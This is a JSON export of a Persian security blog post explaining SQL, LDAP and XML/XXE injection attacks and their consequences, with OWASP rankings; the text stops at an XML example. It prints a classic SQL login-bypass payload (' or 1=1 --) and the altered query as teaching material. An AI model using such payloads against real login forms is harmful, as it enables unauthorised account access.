{"id":4438,"date":"2021-10-30T12:46:25","date_gmt":"2021-10-30T12:46:25","guid":{"rendered":"https:\/\/www.irandnn.ir\/mag\/?p=4438"},"modified":"2022-03-27T13:29:57","modified_gmt":"2022-03-27T13:29:57","slug":"injection-attacks","status":"publish","type":"post","link":"https:\/\/www.irandnn.ir\/mag\/injection-attacks\/","title":{"rendered":"\u0634\u0631\u062d \u0645\u062e\u062a\u0635\u0631\u06cc \u0627\u0632 \u0627\u0646\u0648\u0627\u0639 \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642"},"content":{"rendered":"\u0632\u0645\u0627\u0646 \u0645\u0637\u0627\u0644\u0639\u0647:<\/span> 10<\/span> \u062f\u0642\u06cc\u0642\u0647<\/span><\/span>

\u00a0<\/strong>\u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 \u06cc\u0627 <\/strong>Injection Attacks \u0686\u06cc\u0633\u062a\u061f<\/strong><\/h2>\n
\u0628\u0627 \u0646\u06af\u0627\u0647\u06cc \u0628\u0647 \u062d\u0645\u0644\u0627\u062a \u062a\u062d\u062a \u0648\u0628\u060c \u0628\u0647 \u0633\u0631\u06cc \u062d\u0645\u0644\u0627\u062a\u06cc \u0628\u0631 \u0645\u06cc\u200c\u062e\u0648\u0631\u06cc\u0645 \u06a9\u0647 \u062f\u0631 \u0646\u0627\u0645 \u0622\u0646\u0647\u0627\u060c \u0648\u0627\u0698\u0647\u200c\u06cc Injection \u0628\u0647 \u0645\u0639\u0646\u0627\u06cc \u062a\u0632\u0631\u06cc\u0642 \u0628\u0647 \u0686\u0634\u0645 \u0645\u06cc\u200c\u062e\u0648\u0631\u062f. \u062d\u0645\u0644\u0627\u062a Injection \u06cc\u0627 \u062a\u0632\u0631\u06cc\u0642\u060c \u0627\u0632 \u062c\u0645\u0644\u0647 \u062d\u0645\u0644\u0627\u062a \u0645\u0639\u0631\u0648\u0641 \u0648 \u0634\u0646\u0627\u062e\u062a\u0647 \u0634\u062f\u0647\u200c\u0627\u06cc \u0645\u06cc\u200c\u0628\u0627\u0634\u0646\u062f \u06a9\u0647 \u062a\u0627\u06a9\u0646\u0648\u0646\u060c \u0648\u0628\u200c\u0633\u0627\u06cc\u062a\u200c\u0647\u0627\u06cc \u0632\u06cc\u0627\u062f\u06cc \u0631\u0627 \u062a\u062d\u062a \u062a\u0627\u062b\u06cc\u0631 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f\u0647 \u0627\u0646\u062f. \u062d\u0645\u0644\u0627\u062a\u06cc \u06a9\u0647 \u0637\u0628\u0642 \u0622\u0645\u0627\u0631 \u0634\u0631\u06a9\u062a OWASP\u060c \u0633\u0627\u0644\u200c\u0647\u0627\u06cc \u0632\u06cc\u0627\u062f\u06cc \u0627\u0633\u062a \u06a9\u0647 \u062f\u0631 \u0644\u06cc\u0633\u062a \u067e\u0631 \u0631\u062e\u062f\u0627\u062f\u200c\u062a\u0631\u06cc\u0646 \u062d\u0645\u0644\u0627\u062a \u062a\u062d\u062a \u0648\u0628\u060c \u0642\u0631\u0627\u0631 \u06af\u0631\u0641\u062a\u0647\u200c\u0627\u0646\u062f. \u062f\u0631 \u0627\u06cc\u0646 \u0646\u0648\u0634\u062a\u0627\u0631\u060c \u0628\u0627 \u0645\u0631\u0648\u0631 \u0645\u062e\u062a\u0635\u0631\u06cc \u0628\u0647 \u0627\u0646\u0648\u0627\u0639 \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642\u060c \u0645\u062a\u0648\u062c\u0647 \u0634\u0628\u0627\u0647\u062a\u200c \u0648 \u062a\u0641\u0627\u0648\u062a\u200c\u0647\u0627\u06cc \u0627\u06cc\u0646 \u062d\u0645\u0644\u0627\u062a \u0627\u0632 \u0646\u0638\u0631 \u0627\u062c\u0631\u0627 \u0645\u06cc\u200c\u0634\u0648\u06cc\u0645 \u0648 \u0631\u0627\u0647\u06a9\u0627\u0631\u0647\u0627\u06cc\u06cc \u0628\u0631\u0627\u06cc \u0627\u0645\u0646\u200c\u0633\u0627\u0632\u06cc \u0628\u0631\u0646\u0627\u0645\u0647 \u062f\u0631 \u0628\u0631\u0627\u0628\u0631 \u0627\u06cc\u0646 \u06af\u0631\u0648\u0647 \u0627\u0632 \u062d\u0645\u0644\u0627\u062a \u0631\u0627 \u0628\u06cc\u0627\u0646 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645. \u062f\u0631 \u0627\u062f\u0627\u0645\u0647 \u0628\u0647 \u0645\u0639\u0631\u0641\u06cc \u0627\u0646\u0648\u0627\u0639 \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 \u0645\u06cc\u200c\u067e\u0631\u062f\u0627\u0632\u06cc\u0645.<\/p>\n
\u0627\u0646\u0648\u0627\u0639 \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 \u0686\u06cc\u0633\u062a\u061f<\/strong><\/h3>\n
\u062d\u0645\u0644\u0647 <\/strong>SQL Injection<\/strong><\/h4>\n
\u06af\u0627\u0647\u0627 \u0627\u0632 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0628\u0647\u200c\u0635\u0648\u0631\u062a SQLi<\/strong> \u0647\u0645\u060c \u06cc\u0627\u062f \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u0645\u062e\u062a\u0635\u0631 \u0639\u0628\u0627\u0631\u062a SQL Injection<\/strong><\/a> \u0645\u06cc\u200c\u0628\u0627\u0634\u062f. SQL \u0645\u062e\u0641\u0641 \u0639\u0628\u0627\u0631\u062a Structured Query Language<\/strong> \u0648 \u0628\u0647 \u0645\u0639\u0646\u06cc \u0632\u0628\u0627\u0646 \u067e\u0631\u0633\u200c\u0648\u200c\u062c\u0648 (\u06a9\u0648\u0626\u0631\u06cc) \u0633\u0627\u062e\u062a\u0627\u0631 \u06cc\u0627\u0641\u062a\u0647 <\/strong>\u060c \u0645\u06cc\u200c\u0628\u0627\u0634\u062f \u06a9\u0647 \u0628\u0631\u0627\u06cc \u0627\u0639\u0645\u0627\u0644 \u0639\u0645\u0644\u06cc\u0627\u062a\u06cc \u0645\u0627\u0646\u0646\u062f \u0627\u0646\u062a\u062e\u0627\u0628\u060c \u0627\u06cc\u062c\u0627\u062f\u060c \u0628\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0648 \u062d\u0630\u0641\u060c \u0631\u06a9\u0648\u0631\u062f\u0647\u0627 \u062f\u0631 \u067e\u0627\u06cc\u06af\u0627\u0647\u200c\u062f\u0627\u062f\u0647 (DataBase)\u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u06af\u06cc\u0631\u062f.<\/p>\n
<\/p>\n
$\"\u062d\u0645\u0644\u0627\u062a$ \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0632\u0645\u0627\u0646\u06cc \u0631\u062e \u0645\u06cc\u200c\u062f\u0647\u062f\u060c \u06a9\u0647 \u062f\u0631 \u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc\u060c \u0634\u06cc\u0648\u0647 \u0627\u0631\u062a\u0628\u0627\u0637 \u0628\u0631\u0646\u0627\u0645\u0647 \u0628\u0627 \u067e\u0627\u06cc\u06af\u0627\u0647\u200c\u062f\u0627\u062f\u0647 \u062e\u0648\u062f\u060c \u0646\u0627\u0627\u0645\u0646 \u0628\u0648\u062f\u0647 \u0648 \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u0635\u062d\u06cc\u062d\u06cc \u0628\u0631 \u0631\u0648\u06cc \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u0627\u0631\u0633\u0627\u0644\u06cc \u0635\u0648\u0631\u062a \u0646\u0645\u06cc\u200c\u06af\u06cc\u0631\u062f. \u062f\u0631 \u0627\u06cc\u0646 \u0635\u0648\u0631\u062a\u060c \u0632\u0645\u0627\u0646\u06cc\u200c\u06a9\u0647 \u06cc\u06a9 \u0646\u0641\u0648\u0630\u06af\u0631\u060c \u0628\u0627 \u062a\u0632\u0631\u06cc\u0642 \u06a9\u0648\u0626\u0631\u06cc\u200c\u0647\u0627\u06cc \u0645\u062e\u0631\u0628\u060c \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0645\u062f\u0646\u0638\u0631 \u062e\u0648\u062f \u0631\u0627 \u0627\u0631\u0633\u0627\u0644 \u200c\u06a9\u0646\u062f\u060c \u0627\u06cc\u0646 \u0628\u0631\u0646\u0627\u0645\u0647\u060c \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0631\u0627 \u0645\u062c\u0627\u0632 \u062a\u0644\u0642\u06cc \u0646\u0645\u0648\u062f\u0647 \u0648 \u0628\u0647 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0627\u0648 \u0628\u0631\u0627\u06cc \u0627\u0631\u0633\u0627\u0644 \u06cc\u06a9 \u06a9\u0648\u0626\u0631\u06cc \u0628\u0647 \u067e\u0627\u06cc\u06af\u0627\u0647\u200c\u062f\u0627\u062f\u0647\u060c \u067e\u0627\u0633\u062e \u0645\u06cc\u200c\u062f\u0647\u062f. \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u062f\u0631 \u0634\u0631\u0627\u06cc\u0637 \u0645\u062e\u062a\u0644\u0641 \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0628\u0627 \u0645\u0642\u0627\u0635\u062f \u0632\u06cc\u0631\u060c \u0645\u0648\u0631\u062f \u0628\u0647\u0631\u0647\u200c\u0648\u0631\u06cc \u0642\u0631\u0627\u0631 \u0628\u06af\u06cc\u0631\u062f:<\/p>\n
\n
\u0645\u0648\u062c\u0628 \u062f\u0648\u0631 \u0632\u062f\u0646 \u0633\u06cc\u0633\u062a\u0645 \u0627\u062d\u0631\u0627\u0632\u200c\u0647\u0648\u06cc\u062a \u0648 \u0633\u0637\u062d \u062f\u0633\u062a\u0631\u0633\u06cc(Athentication \u0648 Athorization)<\/li>\n
\u062f\u0631 \u0645\u0639\u0631\u0636 \u062e\u0637\u0631 \u0642\u0631\u0627\u0631 \u06af\u0631\u0641\u062a\u0646 \u06cc\u06a9\u067e\u0627\u0631\u0686\u06af\u06cc \u0648 \u062f\u0631 \u062f\u0633\u062a\u0631\u0633 \u0628\u0648\u062f\u0646 \u0633\u06cc\u0633\u062a\u0645 (Integrity \u0648 Availability)<\/li>\n
\u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 (Remote Code Execution)<\/li>\n<\/ul>\n
\u0645\u062b\u0627\u0644:
\n\u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u06cc \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0648\u0628\u060c \u062f\u0631 \u0635\u0641\u062d\u0647 \u0648\u0631\u0648\u062f \u06a9\u0627\u0631\u0628\u0631\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0647 \u062f\u0644\u06cc\u0644 \u0639\u062f\u0645 \u0627\u0639\u0645\u0627\u0644 \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u062f\u0631\u0633\u062a \u0631\u0648\u06cc \u0648\u0631\u0648\u062f\u06cc\u200c\u0647\u0627\u06cc \u06a9\u0627\u0631\u0628\u0631\u060c \u0645\u0627\u0646\u0646\u062f \u0646\u0627\u0645 \u06a9\u0627\u0631\u0628\u0631\u06cc \u0648 \u0631\u0645\u0632\u060c \u062f\u0686\u0627\u0631 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc SQL Injection \u0634\u0648\u062f. \u062f\u0631 \u0627\u06cc\u0646 \u0635\u0648\u0631\u062a \u0646\u0641\u0648\u0630\u06af\u0631 \u0642\u0627\u062f\u0631 \u0627\u0633\u062a \u0627\u0632 \u0627\u06cc\u0646 \u0637\u0631\u06cc\u0642 \u062f\u0633\u062a\u0648\u0631\u0627\u062a SQL \u0631\u0627 \u0627\u0631\u0633\u0627\u0644 \u0648 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0628\u0631\u0646\u0627\u0645\u0647 \u0627\u062c\u0631\u0627 \u0646\u0645\u0627\u06cc\u062f. \u062f\u0633\u062a\u0648\u0631 SQL \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0634\u062f\u0647 \u062a\u0648\u0633\u0637 \u0628\u0631\u0646\u0627\u0645\u0647\u060c \u0628\u0631\u0627\u06cc \u0648\u0631\u0648\u062f \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0628\u0647 \u0635\u0641\u062d\u0647 \u06a9\u0627\u0631\u0628\u0631\u06cc\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0645\u0634\u0627\u0628\u0647 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0628\u0627\u0634\u062f:<\/p>\n
SELECT * FROM users WHERE username=\u2019$UsernameInput\u2019 AND password=\u2019$PasswordInput\u2019<\/pre>\n
\u0646\u0641\u0648\u0630\u06af\u0631 \u06a9\u0648\u0626\u0631\u06cc \u0645\u0630\u06a9\u0648\u0631 \u0631\u0627 \u0628\u0627 \u062a\u0632\u0631\u06cc\u0642 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u062f\u0631 \u0641\u06cc\u0644\u062f \u0646\u0627\u0645\u200c \u06a9\u0627\u0631\u0628\u0631\u06cc \u062a\u063a\u06cc\u06cc\u0631 \u0645\u06cc\u200c\u062f\u0647\u062f:<\/p>\n
\u2018or 1=1 --<\/pre>\n
\u067e\u0633 \u062f\u0631 \u0646\u0647\u0627\u06cc\u062a \u062f\u0633\u062a\u0648\u0631 SQL \u0627\u0631\u0633\u0627\u0644\u06cc\u060c \u0628\u0631\u0627\u06cc \u0648\u0631\u0648\u062f \u06a9\u0627\u0631\u0628\u0631 \u0628\u0647 \u0635\u0641\u062d\u0647 \u06a9\u0627\u0631\u0628\u0631\u06cc\u060c \u0628\u0647 \u0634\u06a9\u0644 \u062a\u063a\u06cc\u06cc\u0631 \u0645\u06cc\u200c\u06a9\u0646\u062f:<\/p>\n
SELECT * FROM users WHERE username=\u2019\u2019 OR 1=1 --\u2019 AND password=\u2019\u2019<\/pre>\n
\u0628\u0627 \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0634\u0631\u0637 \u0635\u062d\u06cc\u062d \u0628\u0648\u062f\u0646 \u0646\u0627\u0645 \u06a9\u0627\u0631\u0628\u0631\u06cc\u060c \u0628\u0627 \u06cc\u06a9 \u0634\u0631\u0637 \u0647\u0645\u06cc\u0634\u0647 \u062f\u0631\u0633\u062a \u06cc\u0639\u0646\u06cc 1=1 \u062c\u0627\u0628\u0647\u200c\u062c\u0627 \u0645\u06cc\u200c\u0634\u0648\u062f \u0648 \u0627\u062f\u0627\u0645\u0647\u200c\u06cc \u062f\u0633\u062a\u0648\u0631\u060c \u0628\u0647 \u062f\u0644\u06cc\u0644 \u0648\u062c\u0648\u062f \u2013 \u0627\u0635\u0637\u0644\u0627\u062d\u0627 \u06a9\u0627\u0645\u0646\u062a \u0634\u062f\u0647 \u0648 \u0627\u0632 \u062d\u0627\u0644\u062a \u0627\u062c\u0631\u0627 \u062e\u0627\u0631\u062c \u0645\u06cc\u200c\u0634\u0648\u062f. \u062f\u0631 \u0646\u0647\u0627\u06cc\u062a\u060c \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0627 \u0627\u0646\u062c\u0627\u0645 \u0639\u0645\u0644 \u062a\u0632\u0631\u06cc\u0642 \u06a9\u062f \u0628\u0647 \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631\u06cc \u0641\u0631\u062f \u062f\u06cc\u06af\u0631 \u0646\u0641\u0648\u0630 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/p>\n
\u062d\u0645\u0644\u0647 <\/strong>\u00a0LDAP Injection<\/strong><\/h4>\n
\u0648\u0627\u0698\u0647\u200c\u06cc LDAP<\/strong>\u060c \u0645\u062e\u062a\u0635\u0631 \u0639\u0628\u0627\u0631\u062a Lightweight Directory Access Protocol \u0645\u06cc\u200c\u0628\u0627\u0634\u062f \u06a9\u0647 \u067e\u0631\u0648\u062a\u06a9\u0644\u06cc \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0627\u0637\u0644\u0627\u0639\u0627\u062a\u06cc \u062f\u0631 \u0634\u0628\u06a9\u0647 \u0627\u0633\u062a. \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0627\u0632 LDAP \u0628\u0631\u0627\u06cc \u0645\u0648\u0627\u0631\u062f\u06cc \u0645\u0627\u0646\u0646\u062f \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u06cc\u0627 \u062c\u0633\u062a\u200c\u0648\u200c\u062c\u0648 \u062f\u0631 \u0644\u06cc\u0633\u062a \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0646\u0645\u0627\u06cc\u0646\u062f. \u0627\u06cc\u0646 \u0639\u0645\u0644 \u0628\u0648\u0633\u06cc\u0644\u0647 \u0641\u0631\u0633\u062a\u0627\u062f\u0646 \u06cc\u06a9 LDAP Query\u060c \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/p>\n
$\"\"$ <\/p>\n
\u062d\u0645\u0644\u0647\u200c\u06cc LDAP Injection \u06a9\u0647 \u06cc\u06a9 \u062d\u0645\u0644\u0647 \u0633\u0645\u062a \u0633\u0631\u0648\u0631 \u0645\u06cc\u200c\u0628\u0627\u0634\u062f\u060c \u0632\u0645\u0627\u0646\u06cc\u200c \u0631\u062e \u0645\u06cc\u200c\u062f\u0647\u062f \u06a9\u0647 \u062f\u0631 \u0628\u062e\u0634\u06cc \u0627\u0632 \u0628\u0631\u0646\u0627\u0645\u0647\u060c \u0627\u0631\u0633\u0627\u0644LDAP Query \u00a0\u0647\u0627 \u0628\u0631\u0627\u06cc \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc \u0627\u0637\u0644\u0627\u0639\u0627\u062a\u060c \u0628\u0647 \u0634\u06cc\u0648\u0647\u200c\u0627\u06cc \u0646\u0627\u0627\u0645\u0646 \u0627\u0646\u062c\u0627\u0645 \u200c\u0634\u0648\u062f \u0648 \u0646\u0641\u0648\u0630\u06af\u0631 \u0642\u0627\u062f\u0631 \u062e\u0648\u0627\u0647\u062f \u0628\u0648\u062f \u06a9\u0647 \u062f\u0631 \u06a9\u0648\u0626\u0631\u06cc \u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647\u060c \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0645\u062f\u0646\u0638\u0631 \u062e\u0648\u062f \u0631\u0627 \u062a\u0632\u0631\u06cc\u0642 \u0646\u0645\u0627\u06cc\u062f\u061b \u062d\u0627\u0644\u060c \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u06cc \u06af\u0641\u062a\u0647 \u0634\u062f\u0647\u060c \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0646\u0641\u0648\u0630\u06af\u0631 \u0631\u0627 \u0645\u062c\u0627\u0632 \u062f\u0627\u0646\u0633\u062a\u0647 \u0648 \u0628\u0647 \u0622\u0646 \u067e\u0627\u0633\u062e \u0645\u06cc\u200c\u062f\u0647\u062f.<\/p>\n
\u062f\u0631 \u0635\u0648\u0631\u062a \u0645\u0648\u0641\u0642 \u0628\u0648\u062f\u0646 \u06cc\u06a9 \u062d\u0645\u0644\u0647\u200c\u06cc LDAP Injection\u060c \u062f\u0631 \u0634\u0631\u0627\u06cc\u0637 \u0645\u062e\u062a\u0644\u0641\u060c \u0646\u062a\u0627\u06cc\u062c \u0632\u06cc\u0631 \u0631\u0627 \u0628\u0631\u0627\u06cc \u0646\u0641\u0648\u0630\u06af\u0631 \u062f\u0631 \u0628\u0631\u062f\u0627\u0631\u062f:<\/p>\n
\n
\u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0645\u062d\u062a\u0648\u0627\u06cc \u063a\u06cc\u0631 \u0645\u062c\u0627\u0632<\/li>\n
\u062f\u0648\u0631 \u0632\u062f\u0646 \u0645\u062d\u062f\u0648\u062f\u06cc\u062a\u200c\u0647\u0627\u06cc \u0628\u0631\u0646\u0627\u0645\u0647<\/li>\n
\u062c\u0645\u0639 \u0622\u0648\u0631\u06cc \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u063a\u06cc\u0631\u200c\u0645\u062c\u0627\u0632<\/li>\n
\u0627\u06cc\u062c\u0627\u062f \u06cc\u0627 \u062a\u063a\u06cc\u06cc\u0631 \u0627\u0634\u06cc\u0627\u0621 \u062f\u0631 \u0633\u0627\u062e\u062a\u0627\u0631 \u062f\u0631\u062e\u062a\u06cc LDAP<\/li>\n<\/ul>\n
\u0645\u062b\u0627\u0644:<\/strong><\/p>\n
\u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0648\u0628 \u0627\u0632 LDAP \u0628\u0631\u0627\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f \u0648 \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u062f\u0631\u0633\u062a\u06cc \u0628\u0631 \u0648\u0631\u0648\u062f\u06cc\u200c\u0647\u0627\u06cc \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0627\u0646\u062c\u0627\u0645 \u0646\u0645\u06cc\u200c\u062f\u0647\u062f. \u0646\u0641\u0648\u0630\u06af\u0631 \u0645\u062a\u0648\u062c\u0647 \u0627\u06cc\u0646 \u0645\u0648\u0636\u0648\u0639 \u0645\u06cc\u200c\u0634\u0648\u062f \u0648 \u0648\u0631\u0648\u062f\u06cc \u0646\u0627\u0645\u200c\u06a9\u0627\u0631\u0628\u0631\u06cc \u0648 \u0631\u0645\u0632\u0639\u0628\u0648\u0631 \u0631\u0627 \u0628\u0647 \u0634\u06a9\u0644 \u0632\u06cc\u0631 \u067e\u0631 \u0645\u06cc\u200c\u06a9\u0646\u062f:<\/p>\n
**Username=<\/p>\n
Password=<\/p>\n**
\u0628\u0639\u062f \u0627\u0632 \u062a\u0627\u06cc\u06cc\u062f\u060c \u0628\u0631\u0646\u0627\u0645\u0647 \u0628\u0631\u0627\u06cc \u0648\u0631\u0648\u062f \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0647 \u0635\u0641\u062d\u0647 \u06a9\u0627\u0631\u0628\u0631\u06cc\u060c \u0627\u0632 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f:<\/p>\n
(&(user=)(password=))<\/pre>\n
\u062f\u0631 \u0646\u062a\u06cc\u062c\u0647\u200c\u06cc \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0647 \u0635\u0641\u062d\u0647 \u06a9\u0627\u0631\u0628\u0631\u06cc \u062f\u06cc\u06af\u0631 \u0646\u0641\u0648\u0630 \u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f.<\/p>\n
\u062d\u0645\u0644\u0647\u200c <\/strong>XML Injection<\/strong><\/h4>\n
XML \u06cc\u06a9\u06cc \u0627\u0632 \u0632\u0628\u0627\u0646\u200c\u0647\u0627\u06cc \u0646\u0634\u0627\u0646\u0647 \u06af\u0630\u0627\u0631\u06cc \u0627\u0633\u062a \u06a9\u0647 \u0628\u0631\u062e\u0644\u0627\u0641 HTML\u060c \u0645\u0646\u0627\u0633\u0628 \u0628\u0631\u0627\u06cc \u0646\u0645\u0627\u06cc\u0634 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0646\u06cc\u0633\u062a\u061b \u0628\u0644\u06a9\u0647 \u0628\u0631\u0627\u06cc \u062c\u0627\u0628\u0647\u200c\u062c\u0627\u06cc\u06cc\u060c \u0627\u06cc\u062c\u0627\u062f \u0648 \u0630\u062e\u06cc\u0631\u0647 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0628\u0631\u0627\u06cc \u0646\u0645\u0627\u06cc\u0634 \u0622\u0646\u0647\u0627 \u0645\u06cc\u200c\u0628\u0627\u0634\u062f. \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u06a9\u0647 \u0627\u0632 \u0633\u0627\u062e\u062a\u0627\u0631 XML\u060c \u0628\u0631\u0627\u06cc \u0646\u0645\u0627\u06cc\u0634 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u06cc\u0627 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0622\u0646\u0647\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0634\u0648\u062f\u060c \u0648\u0644\u06cc \u0628\u0627\u06cc\u062f \u062a\u0648\u062c\u0647 \u06a9\u0631\u062f \u06a9\u0647 \u0627\u06af\u0631 \u0648\u0631\u0648\u062f\u06cc\u200c\u0647\u0627\u06cc \u0628\u0631\u0646\u0627\u0645\u0647 \u06af\u0641\u062a\u0647 \u0634\u062f\u0647\u060c \u0628\u0647 \u062f\u0631\u0633\u062a\u06cc\u060c \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u0646\u0634\u062f\u0647 \u0628\u0627\u0634\u0646\u062f\u060c \u0646\u0641\u0648\u0630\u06af\u0631 \u0642\u0627\u062f\u0631 \u0627\u0633\u062a \u06a9\u0647 \u062a\u06af\u200c\u0647\u0627\u06cc \u0645\u062f\u0646\u0638\u0631 \u062e\u0648\u062f \u0631\u0627\u060c \u0628\u0631\u0627\u06cc \u0645\u0642\u0627\u0635\u062f \u0645\u062e\u0631\u0628\u0627\u0646\u0647 \u0628\u0647 \u0628\u0631\u0646\u0627\u0645\u0647\u060c \u062a\u0632\u0631\u06cc\u0642 \u0646\u0645\u0627\u06cc\u062f.<\/p>\n
\u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0628\u0627 \u0646\u0627\u0645 \u00a0XXE \u0647\u0645 \u0634\u0646\u0627\u062e\u062a\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u0645\u062e\u0641\u0641 XML External Entity \u0645\u06cc\u200c\u0628\u0627\u0634\u062f \u06a9\u0647 \u062f\u0631 \u0644\u06cc\u0633\u062a OWASP top 10 \u0633\u0627\u0644 2017\u060c \u062f\u0631 \u0631\u062a\u0628\u0647 \u0686\u0647\u0627\u0631\u0645 \u0642\u0631\u0627\u0631 \u062f\u0627\u0634\u062a\u0647 \u0627\u0633\u062a. \u0647\u0645 \u0627\u06a9\u0646\u0648\u0646 \u0646\u06cc\u0632 \u062f\u0631 \u0644\u06cc\u0633\u062a \u0633\u0627\u0644 2021\u060c \u0628\u0627 \u0639\u0646\u0648\u0627\u0646Security Misconfigurations (\u067e\u06cc\u06a9\u0631\u0647\u200c\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0646\u0627\u062f\u0631\u0633\u062a)\u060c \u0627\u062f\u063a\u0627\u0645 \u0634\u062f\u0647 \u0627\u0633\u062a \u0648 \u062f\u0631 \u0631\u062a\u0628\u0647\u200c\u06cc \u067e\u0646\u062c\u0645 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u062f. \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647\u060c \u0628\u0633\u062a\u0647 \u0628\u0647 \u0646\u0648\u0639 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0631\u0646\u0627\u0645\u0647\u060c \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0646\u062a\u0627\u06cc\u062c\u06cc \u0645\u0627\u0646\u0646\u062f \u0627\u062c\u0631\u0627\u06cc \u062d\u0645\u0644\u0647\u200c\u06cc XSS<\/a>\u060c \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u063a\u06cc\u0631\u0645\u062c\u0627\u0632 \u0648 \u062d\u0645\u0644\u0627\u062a\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u062f\u0633\u062a \u0631\u0627 \u0647\u0645\u0631\u0627\u0647 \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u062f.<\/p>\n
$\"\"$ <\/p>\n
\u0645\u062b\u0627\u0644:<\/p>\n
